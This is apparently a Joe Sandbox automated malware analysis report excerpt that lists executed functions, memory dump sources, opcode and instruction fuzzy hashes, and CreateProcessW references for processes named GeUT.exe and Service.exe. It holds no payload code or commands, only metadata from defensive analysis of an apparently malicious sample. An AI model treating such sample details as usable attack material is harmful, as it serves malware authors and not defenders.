Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7914f6e3e7bfd940418be88c5712e604f06d7d6c39d1d5e67adf495b8ad12b
Instruction ID: b71699af24e225998495c223af46089947bd018fcbac2d9d86e1e6488e6898bf
Opcode Fuzzy Hash: 4e7914f6e3e7bfd940418be88c5712e604f06d7d6c39d1d5e67adf495b8ad12b
Instruction Fuzzy Hash: 3C319A71B00B458BDB15BB79982852E7AE2BFC53603109A3DD157CB791DF78ED008B91

Function 00FA1740 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a04e3a3e7b709feb43b284bd1e0f8ff49cc78d9dd35734c8086bab8239bcd0fd
Instruction ID: 5894804a6b65fe7afaaef21c799fed2bb109686c57884aaa0dbdd4e656defda0
Opcode Fuzzy Hash: a04e3a3e7b709feb43b284bd1e0f8ff49cc78d9dd35734c8086bab8239bcd0fd
Instruction Fuzzy Hash: 46314C7490420AEFDB45FFB8D8916AD7FB2FF89300F10466AD101AB355EB746A40CB51

Function 00FA1860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f054816eb6d6a28918300605c3892c1ee0da838af670a5fcd3b8f2a9dcc24e86
Instruction ID: 63beff8e24848300c7ce2f778611b407ef6be3d25c5520c647b801bb4a2875f6
Opcode Fuzzy Hash: f054816eb6d6a28918300605c3892c1ee0da838af670a5fcd3b8f2a9dcc24e86
Instruction Fuzzy Hash: A4215E71B002099FDB44ABF9881936FBAEBEFC9350B14442EE64AD7356DD748D0187A1

Function 00FA1750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463a145cdcb478e6ce5692aea50641f57b5b271e34d84f6f1ea6956e37607aab
Instruction ID: b0fb3b531a47b8bedbb180e810d0c0e503fd66b64d4161aee89e63c7283d0df4
Opcode Fuzzy Hash: 463a145cdcb478e6ce5692aea50641f57b5b271e34d84f6f1ea6956e37607aab
Instruction Fuzzy Hash: 2A216D74A0020AEFDB44FFB8D8816AD7FB6FF88300F10466AD105AB345EB746A40CB50

Function 00FA0939 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a97d8c5cb464a48e6f58a5ff812def32a34ae3bc34d8eed387b219ba4e4d5b2
Instruction ID: 8d344c1751a5dfbe97556a46cac84d1bec538aeb1721158a9e51d55d7bd5b868
Opcode Fuzzy Hash: 8a97d8c5cb464a48e6f58a5ff812def32a34ae3bc34d8eed387b219ba4e4d5b2
Instruction Fuzzy Hash: 6B219D30E09249DFDB45EBB8D8557AEBFE1AF85300F1081A9D40AEB286DB708D14DB81

Function 00FA0828 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f6266002e676427c359bbcd58dc7e2474fb55a7cf19e0b2afb7f31e016609b
Instruction ID: d6228ed9e45dc779ed43196c0b9fc6b431c1de41e1e55b71f6b45de6975d4472
Opcode Fuzzy Hash: e0f6266002e676427c359bbcd58dc7e2474fb55a7cf19e0b2afb7f31e016609b
Instruction Fuzzy Hash: 20211B3410D24AEFDB06EF2CF8929453F75FB897047045AABD1489F26ADAB46D09CBC1

Function 00FA0848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5412b376a3aa5edcd5b7aa079cf795abcadb7f4151c21c024902597a966089e0
Instruction ID: b6a8a86cd6a1a57753c7d978719026182a74ccd53d79dde09510cf873a123315
Opcode Fuzzy Hash: 5412b376a3aa5edcd5b7aa079cf795abcadb7f4151c21c024902597a966089e0
Instruction Fuzzy Hash: EF116C7411910AEFDB06FF2CF9C2A457BA5F78C704700AA6E91489F21DDAB46D099B81

Analysis Process: GeUT.exePID: 4976, Parent PID: 3516COMMON

Executed Functions

Function 008813B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a799244c71033f24f60100e0e990532a796e68f93038e8ba7ac63f88239a06a0
Instruction ID: 89b939aec9b150719b06c1ca846fae011c5e6c99e9af8473ee59e86fee578c18
Opcode Fuzzy Hash: a799244c71033f24f60100e0e990532a796e68f93038e8ba7ac63f88239a06a0
Instruction Fuzzy Hash: 83A1A474B002188FDF18EB74885867E7BB6FFC8710B14896DE546DB395DE349C029B91

Function 00880D95 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 888362c39310690b89f96e787be79c8a0d54dd9bf5e6dbf972cdff4b3955d07d
Instruction ID: 7f21cb2578c72d363c3860275f3f320433fa920df08c7619df25b7bea138f10d
Opcode Fuzzy Hash: 888362c39310690b89f96e787be79c8a0d54dd9bf5e6dbf972cdff4b3955d07d
Instruction Fuzzy Hash: E15169746006428FDB56BFB8E95882E7FE2FBC53043009A6DD506DB2B5EF749C098B91

Function 00881010 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160e77d4bb70727f3b976edc1ce01aeff6ca596e83f47433e2ac8f78db2b9fd2
Instruction ID: d857b86f8f60495731283e1466ac978a13eacea600108fe2f30b625850c45c2a
Opcode Fuzzy Hash: 160e77d4bb70727f3b976edc1ce01aeff6ca596e83f47433e2ac8f78db2b9fd2
Instruction Fuzzy Hash: 11918A347006428FDB55AB78E858A2E7FE2FFC9304B00896DE506DB3A5EF749C058B91

Function 00881970 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4dace8ae9304ef56994e7d37344942a7d13fdbfff506b1a02f00374e486263f
Instruction ID: c851c4c4fc9c2f1fa6a6b4d6e8793a62f90d108b8396ce7f6248a5e1ac3b7e69
Opcode Fuzzy Hash: c4dace8ae9304ef56994e7d37344942a7d13fdbfff506b1a02f00374e486263f
Instruction Fuzzy Hash: 3E310A31B012968FCF18AB79985467E7BF6FFC5300B14846DD806DB386DE349D0687A1

Function 00881157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85283c46617994eae4a73ed2836542866030e42b0adc2be7748ee42b387061ce
Instruction ID: 9087f12ad9f868d64935b4a4ad749ccb93cd3273869379375f4f6c1ae36ecf65
Opcode Fuzzy Hash: 85283c46617994eae4a73ed2836542866030e42b0adc2be7748ee42b387061ce
Instruction Fuzzy Hash: C6315871B00A518BDA65BB79982812E7AE2FFC53103108E3DD656CB790DF74DD048B92

Function 00881860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ba14bd5356e0473b0c358e503de2efc82a981c315ed6584247542002e16330
Instruction ID: ae111aa6a3ffeb420e8826d7fe3a8792c30e1a1db87468249a25ac2468b0f19b
Opcode Fuzzy Hash: 37ba14bd5356e0473b0c358e503de2efc82a981c315ed6584247542002e16330
Instruction Fuzzy Hash: D1218161B042159BDB54ABFD882926FBEEAFFC8340B14842ED54AD7356DD748C0147A2

Function 00881749 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd9d976f7a530bee15f717b3e0a26265a4b95b17c48d1100c8d70d1a4f80029e
Instruction ID: 6ec068b7a0b3896cd98d9f56cb1ebe27c920bc352dbfab9a45b45c9a72433511
Opcode Fuzzy Hash: bd9d976f7a530bee15f717b3e0a26265a4b95b17c48d1100c8d70d1a4f80029e
Instruction Fuzzy Hash: 65318C74A0020ADFDB45EFB8E954AAE7FB2FF84304F104A6DD501AB395DBB06A44CB51

Function 00881750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6862c2d2c66465e8cc96699f4c099685e5c24eb8abccef3fd730b666435791cc
Instruction ID: 7fef6f966d8a86f89ae8c90b8d713a97b1e35d6f91a2873aa6cb4c04739ec474
Opcode Fuzzy Hash: 6862c2d2c66465e8cc96699f4c099685e5c24eb8abccef3fd730b666435791cc
Instruction Fuzzy Hash: D4215C74A0020ADFDB44EFB8D954AAE7FB2FF84304F104A69D505BB355DB746A40CB51

Function 00880939 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a1510a42557670b7745d7bcf85ac0d1b1fbbe557b7bffa10cd97751a282200
Instruction ID: 517eec148dd53d6c1ee1d4ef47ba92fbae3903afedc0e8be1850fe50ef1f5c6a
Opcode Fuzzy Hash: 68a1510a42557670b7745d7bcf85ac0d1b1fbbe557b7bffa10cd97751a282200
Instruction Fuzzy Hash: 93218E30A05258DFCB58EBB8D8553AE7BF1FF84300F1084A9C549DB286EB709E18CB91

Function 00880848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2286363314.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_880000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e1c173a13181827fc3c6275cafec2b528fa911367e9faff59c8ca82f9362618
Instruction ID: 99b631ac6aa3053b3b240854721b17419666761c4ba0e1335e3800cbcabe07e8
Opcode Fuzzy Hash: 0e1c173a13181827fc3c6275cafec2b528fa911367e9faff59c8ca82f9362618
Instruction Fuzzy Hash: DE116A34301207DFDB46FFB8FA88A457FE5F78430C700AA599104BF269DAF46A058B80

Analysis Process: GeUT.exePID: 716, Parent PID: 3516COMMON

Executed Functions

Function 029113B8 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03cac1cfad53a4cd14041148b68492e8d7f85cac324689edff67576c3272e3be
Instruction ID: c792e667ccc82f5b5fcc66ea2573825b018ac6bda113cc0fc707019f4124fa62
Opcode Fuzzy Hash: 03cac1cfad53a4cd14041148b68492e8d7f85cac324689edff67576c3272e3be
Instruction Fuzzy Hash: DCA1B039F002199FDB08DB79885467E7BB7BFC8750B198869D506EB388CE359C02CB91

Function 02910D95 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ecdb8d7750064c098ab4754c69f9bb37b50670b4d013a131a759b24adb6f1b1
Instruction ID: a50d1ae7f5b2325b8b1da05220ea559c44ed68548b02a387850cd2472d9e9143
Opcode Fuzzy Hash: 0ecdb8d7750064c098ab4754c69f9bb37b50670b4d013a131a759b24adb6f1b1
Instruction Fuzzy Hash: F4513C38A106468FDB05BB78E85C96D7BA6FB883003005A7CD5278B795EF74981ACF91

Function 02911010 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf01462e4c911814907d3279aceb95899201d23acdd5759436e76fe6b718e7a
Instruction ID: 21c5cd23ac263779d5d61aadff4e6de8a1662188dada69da3aef3bbc23d49ea0
Opcode Fuzzy Hash: 8cf01462e4c911814907d3279aceb95899201d23acdd5759436e76fe6b718e7a
Instruction Fuzzy Hash: 68915E38B002458FDB05AB79D85CA2E7BB6FB88300B104969E516DB3E5EF749C09CB91

Function 02911860 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cdabae952c6596ef206d2ac50c825088de90870ed5a7d5fe1ec95818ae3d7f6
Instruction ID: d59fe83020e9bf83074e8f6ee45afe5b3b1d2722dbf82e0049dbb3f1f6dbb3c4
Opcode Fuzzy Hash: 6cdabae952c6596ef206d2ac50c825088de90870ed5a7d5fe1ec95818ae3d7f6
Instruction Fuzzy Hash: 4E319375B00209AFEB44ABF9D81877EBFABEFC4310F104469D64AD7385DE7449028B61

Function 02911970 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6087a0083423a449e709a775f2f9b7f2828a9b276eebcdb475d0aa6ba2799ff0
Instruction ID: e068d38788efc1836914605a8de475106575940cb17a4cda314bf7107f32f8be
Opcode Fuzzy Hash: 6087a0083423a449e709a775f2f9b7f2828a9b276eebcdb475d0aa6ba2799ff0
Instruction Fuzzy Hash: 05312435B012969FDB58EB79985427EBBF7AFC8300B14846DD54ADB389DE308C06CB91

Function 02911157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cd913a7280ea9028344a976b0247027b9af09385f4dc0ec0160d17e6b28ce8d
Instruction ID: 88f70f2ab5e78155498d88d88116c5d23624a85497efd901366a83d39ac611a9
Opcode Fuzzy Hash: 0cd913a7280ea9028344a976b0247027b9af09385f4dc0ec0160d17e6b28ce8d
Instruction Fuzzy Hash: 57315835B00B458BDA15AB79C81862EBAE2BFC52103108E3DD56ACB780DF74DD188F92

Function 02911740 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945b9783d16c01c2e44f2754ea8e12e2b02eb3035a7fa72f2fe1b8190e3245d6
Instruction ID: fa48ae428d9151a8e6419263115543131061eaa9f32b050d58d6701f246dc239
Opcode Fuzzy Hash: 945b9783d16c01c2e44f2754ea8e12e2b02eb3035a7fa72f2fe1b8190e3245d6
Instruction Fuzzy Hash: A431AC78E0020ADFDB45EBB8D8546AEBFB6FF84300F104569D105AB385EB746A45CF51

Function 02910939 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83fce5f4bc7f0baa794f6d0f4eef3c83bfb3da5ee52274423712706693893286
Instruction ID: a8966646d1f2148c31cada4149b9539c8c1307dbd5ff239401d1ce77445d40dd
Opcode Fuzzy Hash: 83fce5f4bc7f0baa794f6d0f4eef3c83bfb3da5ee52274423712706693893286
Instruction Fuzzy Hash: F421AE34E042099FDB45EBB8D8583AE7BE6EF84310F1080B9D909DB285EB749D46CB91

Function 02911750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0766bf96918207f1551e6626e072e29b2a94de7de425378d11605ab687a2d869
Instruction ID: d5f526368f3392a5b83396ca5779c2d73577fd64654beceb50cef623f9120ad7
Opcode Fuzzy Hash: 0766bf96918207f1551e6626e072e29b2a94de7de425378d11605ab687a2d869
Instruction Fuzzy Hash: FF215A78E0020ADFDB44FBB8D8546AEBBB6FF84300F104A69D105AB385EB746A45CF51

Function 02910848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2287014834.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2910000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7ad01dce587d2e6183d632ffa6674337693a66a6aaeb94d26338b31258dbfb
Instruction ID: 29b048ca97475dcd55c411b3837e9ba905205b208d7c15cbdff15bca2140b29d
Opcode Fuzzy Hash: 3f7ad01dce587d2e6183d632ffa6674337693a66a6aaeb94d26338b31258dbfb
Instruction Fuzzy Hash: 0411893450120BDFDF06FF28F984A557BB9FB84304B00AA6C91249F35DDAB4690B9F90

Analysis Process: Service.exePID: 7072, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	29.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	39
Total number of Limit Nodes:	4

Executed Functions

Function 00B35C6C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B35E49

Strings

Q,, xrefs: 00B35CB9

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: e7fc52f691efc95b9f0a545f07cbd90e0a8e72481daddaa8dc0c7764f263c1c1
Instruction ID: 827dab7ddf47e468937217c3802c71d957380e3caaba00a6292e24d772e2b751
Opcode Fuzzy Hash: e7fc52f691efc95b9f0a545f07cbd90e0a8e72481daddaa8dc0c7764f263c1c1
Instruction Fuzzy Hash: B181C074C00269DFDB21CFA9C944BEDBBF5AB49300F1091EAE509B7261DB709A89CF54

Function 00B36EA4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00B37081

Strings

Q,, xrefs: 00B36EF1

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: 12da26835fe416e1b38ddd1d78e0e601673be3c34918c234a2aff6848ca26a3a
Instruction ID: bf02198a1eba3a1085ee1a89e5dbe3f5dcf997b51b1ae978842c536e8abd7fba
Opcode Fuzzy Hash: 12da26835fe416e1b38ddd1d78e0e601673be3c34918c234a2aff6848ca26a3a
Instruction Fuzzy Hash: 4381B2B5C00269DFDB25CFA8D984BDDBBF5AB09300F1095AAE508B7260DB709A85CF54

Function 00B34E34 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B35011

Strings

Q,, xrefs: 00B34E81

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: 94268bd3799d5369de37d033793021dc1feafc02e8b0d9bcd8581616097a4636
Instruction ID: 763bae8eb16c148d6a9cd12d40a76bfe7a65207c0e68c117f341e78eed4e27d1
Opcode Fuzzy Hash: 94268bd3799d5369de37d033793021dc1feafc02e8b0d9bcd8581616097a4636
Instruction Fuzzy Hash: FE81BF74C00269CFDF25CFA9C940BEDBBF5AB49300F1491AAE508B7261DB709A89DF54

Function 00B34024 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00B37081

Strings

Q,, xrefs: 00B36EF1

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: 5ce4988094042d26d52e5e3d09222a31b20ce7dc145d645f588caed24cc82613
Instruction ID: 8cffcd28bd6ca6ab8a035d55e5d1eecf06d2f3d965323d543b781f7b63508206
Opcode Fuzzy Hash: 5ce4988094042d26d52e5e3d09222a31b20ce7dc145d645f588caed24cc82613
Instruction Fuzzy Hash: BF81C375C00259DFDB21CFA9D984BDDBBF5AB49300F1091EAE508B7250DB709A85CF54

Function 00B3614C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00B37EB9

Strings

Q,, xrefs: 00B37D29

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: ef7e465e445e865b8a6185dae84327c2eb07f01242f7556a465d08b6e1d2c74a
Instruction ID: fc93063257ed26e4b44600672cebe88ccfe67495d35015180585434811ec50e1
Opcode Fuzzy Hash: ef7e465e445e865b8a6185dae84327c2eb07f01242f7556a465d08b6e1d2c74a
Instruction Fuzzy Hash: D781A1B4C04269DFDB21CFA9C984BEDBBF5AB49300F1091EAE508B7250DB709A85CF54

Function 00B31B9C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B31D79

Strings

Q,, xrefs: 00B31BE9

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: 19af7c1757910cf3c87f231394d5ea7105f4df3d86914cd1ff78e2a2df81d8bd
Instruction ID: f64cdbfcb57a5da2c3151ed1a54e9fd9a5d68b3b1e125936aca9f1da2a843d38
Opcode Fuzzy Hash: 19af7c1757910cf3c87f231394d5ea7105f4df3d86914cd1ff78e2a2df81d8bd
Instruction Fuzzy Hash: 0F81C174C00269DFDB21CFA9C940BEDBBF5AB49300F1095AAE508B7261DB709A89DF54

Function 00B37CDC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00B37EB9

Strings

Q,, xrefs: 00B37D29

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: b167f8d54d2202940c4f129cf9e08ce662a56f6c20aeef04ba08922c1bb97a8c
Instruction ID: c888cfd9196a8286a26e4217c6228e59a6cd4e9afb98e262983e75c30d003638
Opcode Fuzzy Hash: b167f8d54d2202940c4f129cf9e08ce662a56f6c20aeef04ba08922c1bb97a8c
Instruction Fuzzy Hash: E481B2B5C00269DFDB21CFA9C984BEDBBF5AB49300F1091EAE508B7250DB709A85CF54

Function 00B31BA8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B31D79

Strings

Q,, xrefs: 00B31BE9

Memory Dump Source

Source File: 0000000B.00000002.2338060274.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b30000_Service.jbxd

Similarity

API ID: CreateProcess
String ID: Q,
API String ID: 963392458-4241536049
Opcode ID: 996da8fc4eb4f76040b8eb621ca1ba6d0664c520c129f5f3de7bf101974a11c1
Instruction ID: c6fd610754bdd880e1b9202d8c113b60822d28f0fd196d67e3e2ce6471e24a5e
Opcode Fuzzy Hash: 996da8fc4eb4f76040b8eb621ca1ba6d0664c520c129f5f3de7bf101974a11c1
Instruction Fuzzy Hash: D081C174C00229DFDF21CFA9C940BDDBBF5AB49300F1095AAE508B7261DB709A89DF54

Function 00B35C78 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220
